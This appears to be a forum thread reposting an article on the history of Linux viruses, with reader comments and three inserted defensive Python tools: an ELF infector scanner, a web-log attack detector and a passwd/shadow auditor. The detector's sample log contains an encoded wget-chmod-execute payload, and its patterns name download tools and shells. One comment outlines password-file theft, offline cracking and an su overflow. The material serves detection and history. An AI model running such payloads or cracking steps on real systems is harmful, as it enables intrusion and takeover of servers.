A history of viruses on Linux
Posted on 11/29/2010 5:35:05 AM PST by ShadowAce
We recently gave you a brief history of viruses on the Mac, and as requested by a reader we wanted to give you a history of viruses on Linux. Linux's multi-user permission model means that code running as an ordinary user cannot touch system binaries, which limits what most malware can do unless it also finds a privilege-escalation flaw, but some authors have found ways around those measures. There are several free anti-virus options for Linux that you really should use, even if only for a weekly or monthly scan. Free anti-virus solutions include ClamAV, AVG, Avast and F-Prot.
The virus-writing group VLAD wrote the first Linux virus, named Staog. The virus exploited a flaw in the system that allowed it to stay resident in memory and wait for a binary to be executed; once one was, the virus attached itself to that file. Shortly after the virus was discovered the flaw was fixed and the virus quickly died out. VLAD was also responsible for Boza, the first known virus for Windows 95.
The Bliss virus made its way into the wild. It attached itself to executables on the system and prevented them from running. A user had to be running as root for the virus to infect the system, and to this day Debian lists itself as still being vulnerable to it. The threat to Debian users is minimal, though, as they do not typically run as root.
No significant Linux viruses were reported in 1999, but oddly enough a hoax went around about a virus that threatened to install Linux on your computer. At the time the Melissa virus was ravaging PCs worldwide, and on April 1, 1999 (April Fools' Day) a message went out warning that a virus named Tuxissa was secretly installing Linux on unsuspecting computers.
A rather harmless virus, Virus.Linux.Winter.341, showed up and inserted itself into ELF files (ELF is the executable format used by Linux). The virus was very small, only 341 bytes, and wrote the string "LoTek by Wintermute" into the note section of the ELF file. It was also supposed to change the host name to Wintermute, but never gained control of a machine to make the change.
2001 was an eventful year for Linux viruses. The first was the ZipWorm, a harmless virus that simply attached itself to any zip files in the directory it was executed in. Next was the Satyr virus, also harmless; it attached itself to ELF files, adding the string "unix.satyr version 1.0 (c)oded jan-2001 by Shitdown [MIONS], http://shitdown.sf.**" (URL edited because it causes Avast to block the page). There was also the Ramen worm, which replaced index.html files with its own version, displaying "Ramen Crew" at the top and a package of Ramen noodles at the bottom. Later a worm named Cheese came out that actually closed the backdoors created by Ramen. Several other relatively harmless viruses were released that year.
In 2002 a vulnerability in Apache led to the creation and spread of the Mighty worm. The worm exploited a vulnerability in Apache's SSL implementation to infect the victim's server. Once on the machine it quietly connected to an IRC server and joined a channel to wait for commands, turning the infected hosts into an IRC-controlled botnet.
Another harmless virus, Rike, showed up. The virus, written in assembly language, attached itself to an ELF file, expanding the space the file required and writing the string "RIKE" into the newly added space.
Similar to the previous year's virus, the Binom virus simply expanded the size of the file and wrote the string "[ Cyneox/DCA" into the free space. It spread when an infected file was executed.
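The three ELF infectors above leave traces that can be found without a signature database: Winter writes a tag into the note section, and Rike and Binom grow the file and write a tag into the new space past the end of the original binary. The following scanner is an added example, not code from the article or from any of the viruses named; the marker list and the constructed sample binaries are assumptions made for the demonstration. It parses the ELF section table (32- or 64-bit, either endianness), reports marker strings found inside SHT_NOTE sections, and reports any bytes that sit beyond the file's declared extent, the "overlay" a file-appending infector leaves behind.

```python
"""Look for the two traces left by the ELF infectors described above: a marker
planted in a note section (Winter) and bytes appended past the file's declared
end (Rike, Binom). Standard library only."""
import struct
from dataclasses import dataclass, field

SHT_NOTE, SHT_NOBITS = 7, 8
# Strings the article quotes for Winter, Rike and Binom; treat the list as an assumption to extend.
MARKERS = [b"LoTek by Wintermute", b"RIKE", b"[ Cyneox/DCA"]


@dataclass
class ScanResult:
    note_markers: list = field(default_factory=list)     # markers seen inside SHT_NOTE sections
    overlay_size: int = 0                                 # bytes beyond the last section/header
    overlay_markers: list = field(default_factory=list)  # markers seen in that overlay

    @property
    def suspicious(self) -> bool:
        return bool(self.note_markers or self.overlay_size)


def parse_sections(data: bytes):
    """Return (sections, end of section header table) for ELF32/ELF64, either endianness."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    e = "<" if data[5] == 1 else ">"                      # EI_DATA: 1 = little-endian
    if data[4] == 2:                                      # EI_CLASS: 2 = ELF64
        (shoff,) = struct.unpack_from(e + "Q", data, 0x28)
        shentsize, shnum, shstrndx = struct.unpack_from(e + "HHH", data, 0x3A)
        fmt = e + "IIQQQQIIQQ"
    else:                                                 # ELF32
        (shoff,) = struct.unpack_from(e + "I", data, 0x20)
        shentsize, shnum, shstrndx = struct.unpack_from(e + "HHH", data, 0x2E)
        fmt = e + "IIIIIIIIII"
    if shnum == 0:
        raise ValueError("no section header table (a program-header walk is needed instead)")
    raw = [struct.unpack_from(fmt, data, shoff + i * shentsize) for i in range(shnum)]
    # Section header fields used here: [0]=sh_name [1]=sh_type [4]=sh_offset [5]=sh_size
    str_off, str_size = raw[shstrndx][4], raw[shstrndx][5]
    strtab = data[str_off:str_off + str_size]
    sections = [{"name": strtab[s[0]:].split(b"\0", 1)[0].decode("ascii", "replace"),
                 "type": s[1], "offset": s[4], "size": s[5]} for s in raw]
    return sections, shoff + shnum * shentsize


def scan_elf(data: bytes) -> ScanResult:
    result = ScanResult()
    sections, declared_end = parse_sections(data)
    for sec in sections:
        body = data[sec["offset"]:sec["offset"] + sec["size"]]
        if sec["type"] == SHT_NOTE:
            result.note_markers += [m.decode() for m in MARKERS if m in body]
        if sec["type"] != SHT_NOBITS:                     # .bss occupies no bytes in the file
            declared_end = max(declared_end, sec["offset"] + sec["size"])
    overlay = data[declared_end:]
    result.overlay_size = len(overlay)
    result.overlay_markers = [m.decode() for m in MARKERS if m in overlay]
    return result


def make_note(name: bytes, desc: bytes, ntype: int = 1) -> bytes:
    """Encode one ELF note: namesz, descsz, type, then name and desc padded to 4 bytes."""
    pad = lambda b: b + b"\0" * (-len(b) % 4)
    return struct.pack("<III", len(name), len(desc), ntype) + pad(name) + pad(desc)


def build_sample_elf(note: bytes, overlay: bytes = b"") -> bytes:
    """Constructed minimal ELF64 (x86-64, no code, no program headers): header, .note, .shstrtab, table."""
    shstrtab = b"\0.note\0.shstrtab\0"                  # name offsets: .note = 1, .shstrtab = 7
    note_off = 64
    str_off = note_off + len(note)
    shoff = str_off + len(shstrtab)
    shoff += -shoff % 8                                  # 8-byte align the section header table
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8  # ELFCLASS64, little-endian, EV_CURRENT
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, 0, shoff, 0, 64, 56, 0, 64, 3, 2)
    shdr = lambda nm, typ, off, sz: struct.pack("<IIQQQQIIQQ", nm, typ, 0, 0, off, sz, 0, 0, 1, 0)
    table = shdr(0, 0, 0, 0) + shdr(1, SHT_NOTE, note_off, len(note)) + shdr(7, 3, str_off, len(shstrtab))
    body = ehdr + note + shstrtab
    return body + b"\0" * (shoff - len(body)) + table + overlay


CLEAN_NOTE = make_note(b"GNU\0", struct.pack("<IIII", 0, 3, 2, 0))   # NT_GNU_ABI_TAG, Linux 3.2.0
SAMPLES = {                                                          # constructed test binaries
    "clean": build_sample_elf(CLEAN_NOTE),
    "winter": build_sample_elf(make_note(b"GNU\0", b"LoTek by Wintermute")),
    "rike": build_sample_elf(CLEAN_NOTE, overlay=b"\0" * 32 + b"RIKE"),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        r = scan_elf(blob)
        print(f"{label:6} suspicious={r.suspicious} notes={r.note_markers} "
              f"overlay={r.overlay_size}B markers={r.overlay_markers}")
```

The overlay check is the more general of the two: any file-appending infector, not just the ones quoted here, shows up as bytes beyond the last section or header, so it catches a sample with an unknown tag. A legitimate binary can also carry an overlay (self-extracting archives and some installers do), so treat the finding as a lead to inspect rather than proof of infection. Stripped binaries with no section table need a program-header walk, which this example does not attempt.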
The Lupper worm began spreading to vulnerable Linux web servers. The worm requested a specific URL on the target server, then attempted to exploit a vulnerable PHP or CGI script. If the server allowed remote shell command execution and file downloads, it became infected and began searching for another server to infect.
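The Lupper behaviour described above, a probe for a specific URL followed by an exploit payload that tells the script to run shell commands and download a file, is visible in an ordinary web server access log. The following detector is an added example, not part of the article or of the worm; the log excerpt is constructed (addresses, paths and payload are invented), and the indicator list and probing threshold are assumptions. It decodes each request's query string twice, since attackers often double-encode, flags script requests whose parameters carry shell separators, download tools or chmod, and flags clients that touch several distinct script paths.

```python
"""Flag Lupper-style activity in a web server access log: clients probing many
script URLs, and script requests whose parameters carry shell commands or
download instructions. Standard library only; the log lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
SCRIPT_EXT = (".php", ".cgi", ".pl")
# Indicators of command execution / file download inside a script parameter (assumed list).
INJECTION_PATTERNS = {
    "command separator": re.compile(r"[;|`]|\$\("),
    "download tool": re.compile(r"\b(wget|curl|fetch|lynx)\b"),
    "shell path": re.compile(r"/bin/(?:ba)?sh\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "directory traversal": re.compile(r"\.\./"),
}
PROBE_THRESHOLD = 3   # distinct script paths from one client before we call it scanning (assumption)


def parse_line(line: str):
    """Split one CLF line into fields, decoding the path and (twice) the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = unquote(path)
    rec["query"] = unquote(unquote(query))   # worms often double-encode their payload
    return rec


def injection_indicators(rec) -> list:
    """Names of the indicators present in a script request's decoded query, else []."""
    if not rec["path"].lower().endswith(SCRIPT_EXT):
        return []
    return [name for name, rx in INJECTION_PATTERNS.items() if rx.search(rec["query"])]


def analyze(log_text: str) -> dict:
    """Return {'injections': [(ip, path, indicators)], 'scanners': {ip: sorted script paths}}."""
    injections, probes = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].lower().endswith(SCRIPT_EXT):
            probes[rec["ip"]].add(rec["path"])          # status is irrelevant: 404s are still probes
        hits = injection_indicators(rec)
        if hits:
            injections.append((rec["ip"], rec["path"], hits))
    scanners = {ip: sorted(paths) for ip, paths in probes.items() if len(paths) >= PROBE_THRESHOLD}
    return {"injections": injections, "scanners": scanners}


# Constructed access-log excerpt; hosts are documentation ranges, paths and payload are invented.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Nov/2005:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.10 - - [05/Nov/2005:10:12:03 +0000] "GET /images/logo.png HTTP/1.1" 200 8812
198.51.100.7 - - [05/Nov/2005:10:12:07 +0000] "GET /cgi-bin/stats.pl HTTP/1.0" 404 291
198.51.100.7 - - [05/Nov/2005:10:12:08 +0000] "GET /admin/upload.php HTTP/1.0" 404 291
198.51.100.7 - - [05/Nov/2005:10:12:09 +0000] "GET /cgi-bin/view.cgi HTTP/1.0" 200 733
198.51.100.7 - - [05/Nov/2005:10:12:10 +0000] "GET /cgi-bin/view.cgi?file=%7Cwget%2520http%3A%2F%2F198.51.100.7%2Fx%3Bchmod%2520%2Bx%2520x%3B.%2Fx%7C HTTP/1.0" 200 0
203.0.113.22 - - [05/Nov/2005:10:13:00 +0000] "POST /search.php?q=ramen+noodles HTTP/1.1" 200 2210
"""

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, path, hits in report["injections"]:
        print(f"injection attempt from {ip} against {path}: {', '.join(hits)}")
    for ip, paths in report["scanners"].items():
        print(f"script probing from {ip}: {len(paths)} distinct paths {paths}")
```

The two rules reinforce each other: the probing rule shows the worm hunting for a vulnerable script, and the injection rule shows the payload once it finds one. Both fire on the same client in the sample, which is the combination worth paging on; either alone (a single 404 on a CGI path, or a legitimate parameter that happens to contain a pipe) deserves a lower severity.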
A variant of the 2002 Mighty worm named Kaiten appeared. Like its predecessor, it connected to an IRC channel and waited for commands to execute.
A malicious OpenOffice macro led to the spread of a virus named BadBunny, which could infect Windows, Mac and Linux machines. On Linux it creates a file called badbunny.py as an XChat script and badbunny.pl, a Perl virus that infects other Perl files. A trojan horse named Rexob was also released that year; once on the machine it opened a backdoor allowing remote code execution.
A website where GNOME users download screensavers and other eye candy unknowingly hosted a malicious screensaver called WaterFall. Once installed, it opened a backdoor that, when triggered, made the machine take part in a distributed denial of service (DDoS) attack. The attack was very specific, targeting a single website, MMOwned.com.
Koobface, a virus that spreads through social networking sites, targets Windows, Mac and, in a more recent variant, Linux computers. Once installed, it attempts to gather login credentials for FTP and social networking sites. Once your password has been compromised, the virus sends an infected message to all of your friends on the social network.
This is by no means a complete list of Linux viruses, but it covers the major ones. It also shows that most of the viruses found on Linux are fairly harmless. That doesn't mean they don't exist, though. Keep an eye on what you're downloading and where you're going on the Internet and you will most likely stay virus free. An occasional virus scan wouldn't hurt either.
Windows focused on functionality while unix/linux focused on stability and security. MS grabbed market share . . . and the vast majority of the viruses.
Exactly. Also, Windows focused on single-user machines. That is a very different mindset than multiuser systems. They are still trying to recover from that.
If that’s the virus history of Linux, then we’ve established that Linux has to be a damn safe system. Imagine a Microsoft virus history...
I blame a lack of willingness to harshly punish those who engage in such criminal conspiracy.
That's certainly one aspect of it. Another is the ability of 9-yo script kiddies to write virii for a mainstream OS. That should tell you something about the OS itself.
The same people who wrote the first Linux virus wrote the first Win-95 virus.
Check your OS ego and attack problems, not platforms.
Governments, hipsters, and organized crime push out malware that costs billions in lost productivity and “software scanning” solutions.
But apparently, the view among political leadership is “we can absorb a computer attack” just as Barack Obama, POTUS, claims with regards to a terrorist attack.
9-year trained infantryman from Afghanistan could also cause a plane to nosedive.
Hackers are scum who deserve to be eradicated like any other terrorist or embezzler. It is malicious vandalism of the worst sort.
I do have the ability to recognize where problems exist. One of those problems is the platform. I am NOT excusing the virus writer and malicious hacker.
If Mercedes started advertising that their cars were now lock-free, or (for a modest fee) a metal loop could be attached that you can then use to twist a paperclip around to keep car thieves out, would you then blame only the thieves, or would you try to get Mercedes to beef up their security?
It is the same thing. Windows, while it does have some security, is not as strong as it could be. This is done in the name of "backward compatibility" and functionality.
The platform does bear some of the responsibility, while the black hats bear all of it.
I don’t blame the firm that made the highway when a thief or drunk flees from police down the wrong side of the road.
“because it’s there” is no excuse to doing pure evil.
The lack of willpower to adequately pursue those who engage in such criminal conspiracy has left us where we are today.
And I consider it an issue of national defense worthy of the full powers of our defenses.
And although Unix had a reasonably sophisticated concept of file privileges (especially for its time), default file privileges were kind of loose. This was to be expected in the cooperative, non-adversarial environment in which Unix arose.
The password mechanism was innovative, in that passwords were not stored in plain text, but were encrypted, using each password as its own key. This led the designers to make the user file, with its encrypted passwords, publicly readable. That allowed for extensive brute-force attempts to crack the password file, after it was copied somewhere else, off-line.
And with any reasonable number of users, at least one user would have a trivial password (this was before there was any built-in enforcement of password complexity). A colleague of mine wrote a snooper program that examined the passwd file for trivial passwords, and reported the results to him. He was continually uncovering trivial, and therefore, easily hackable, passwords.
Therefore, you could hack into the system by guessing passwords. Then, you'd go straight to the password file and ftp it to your own machine. Then, you'd go to work exhaustively testing random passwords, encrypted against themselves, against all entries in the file. You might get lucky and hit on somebody with real privileges, and of course then you were in, with whatever privileges the hittee had.
Of course, if you knew the exact structure of the shell object code, you could log in from Joe Schmo's non-privileged account, and fill the password field with a long string that would overwrite the critical part of the su command handling code with instructions that would simply make you super-user on the spot. Then you were also in, without having to guess the password of any user with real power.
We won't have time to list them all.
I'll have to assume that this was a while ago, as all modern unixes that I know use the /etc/shadow file rather than storing the password in the /etc/passwd file.
Permissions on /etc/shadow are 000 ...
ls -al /etc/shad*
---------- 1 root root 2665 2010-11-11 14:24 /etc/shadow
----------. 1 root root 2543 2010-11-04 11:39 /etc/shadow-
Without already having an exploit, it would be kind of difficult to get at.
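The distinction the commenter draws, a world-readable passwd file that once carried the hashes versus a shadow file with mode 0000, can be checked mechanically. The following audit is an added example, not the commenter's code; the passwd and shadow records (including the hash strings) are constructed, and the prefix-to-algorithm mapping follows the common crypt(3)/libxcrypt convention. It flags hashes that still live in passwd, empty password fields, extra UID 0 accounts, legacy hash algorithms in shadow, and a shadow mode that grants anything to group or other.

```python
"""Audit passwd/shadow records for the conditions discussed above: hashes in the
world-readable passwd file, empty password fields, extra UID 0 accounts, legacy
hash algorithms, and a shadow file readable by others. Standard library only."""
import stat

# Password-field values that mean "no hash here" (points to shadow, or locked/disabled).
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", "*NP*", "*LK*"}
# crypt(3) prefixes -> scheme; assumed mapping of the usual libxcrypt identifiers.
HASH_PREFIXES = [("$6$", "sha512crypt"), ("$5$", "sha256crypt"), ("$y$", "yescrypt"),
                 ("$7$", "scrypt"), ("$2", "bcrypt"), ("$1$", "md5crypt (weak)")]


def hash_algorithm(pw: str) -> str:
    """Name the hashing scheme a password field uses."""
    for prefix, name in HASH_PREFIXES:
        if pw.startswith(prefix):
            return name
    if len(pw) == 13 and "$" not in pw:
        return "traditional DES crypt (weak, 8-char max, 12-bit salt)"
    return "unknown"


def _records(text: str, nfields: int, kind: str):
    """Yield (user, fields) for well-formed lines and (None, finding) for malformed ones."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != nfields:
            yield None, (f"line {n}", f"malformed {kind} record")
        else:
            yield fields[0], fields


def audit_passwd(text: str) -> list:
    """Findings for /etc/passwd content: (user, issue) tuples in file order."""
    findings = []
    for user, fields in _records(text, 7, "passwd"):
        if user is None:
            findings.append(fields)
            continue
        pw, uid = fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field: login with no password"))
        elif pw not in SHADOW_PLACEHOLDERS and not pw.startswith("!"):
            findings.append((user, f"hash stored in world-readable passwd: {hash_algorithm(pw)}"))
        if uid == "0" and user != "root":
            findings.append((user, "additional UID 0 account"))
    return findings


def audit_shadow(text: str) -> list:
    """Findings for /etc/shadow content: empty passwords and legacy or unrecognized hashes."""
    findings = []
    for user, fields in _records(text, 9, "shadow"):
        if user is None:
            findings.append(fields)
            continue
        pw = fields[1]
        if pw == "":
            findings.append((user, "empty password field: login with no password"))
        elif pw not in SHADOW_PLACEHOLDERS and not pw.startswith("!"):
            algo = hash_algorithm(pw)
            if "weak" in algo or algo == "unknown":
                findings.append((user, f"legacy or unrecognized hash: {algo}"))
    return findings


def shadow_mode_ok(st_mode: int) -> bool:
    """True when the shadow file grants nothing to group/other (0600, or the 0000 shown above)."""
    return stat.S_IMODE(st_mode) & 0o077 == 0


# Constructed records; the hash strings are made up and verify no real password.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:ab4zq6Xa0E8wM:1001:1001:Legacy User:/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
toor:x:0:0:backup root:/root:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$Z6jK2Q3b9p1XhW4u5n7tT0uV8cY2dF3gH5jL7kM9nP1qR3sT5uW7xZ9aB1cD3eF5gH7jK9lM1nP3qR5sT7u:18900:0:99999:7:::
daemon:*:18900:0:99999:7:::
old:$1$saltsalt$abcdefghijklmnopqrstuv:18900:0:99999:7:::
nopass::18900:0:99999:7:::
"""

if __name__ == "__main__":
    import os
    for user, issue in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {issue}")
    try:   # on a live system, also check the real file's mode
        print("shadow mode ok:", shadow_mode_ok(os.stat("/etc/shadow").st_mode))
    except OSError as exc:
        print("could not stat /etc/shadow:", exc)
```

The passwd check matters because the file must stay world-readable for ls, ps and friends to map UIDs to names; any hash that lands in it is available to every local user for offline cracking, which is exactly the attack described a few comments up. The shadow check matters for the opposite reason: a correct 0000 or 0600 mode is what makes the commenter's "without already having an exploit" observation hold.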
You're right that early versions of Unix were much more loose permission-wise on many files and directories. Fortunately, as the environment became more hostile, it was much easier to secure the environment because it was based on the premise of multiple users in the first place. Microsoft had to start from a single-user system that essentially had no permissions granularity at all to something more secure, and the world has felt the pain of some of the architectural decisions they made during the process.
Yeah, most of my Unix dealings were from '78 to about '85.
Microsoft had to start from a single-user system that essentially had no permissions granularity at all to something more secure, and the world has felt the pain of some of the architectural decisions they made during the process.
And I feel that pain every time I try to fix up the functionality of my W/XP and Vista file sharing here at the shack.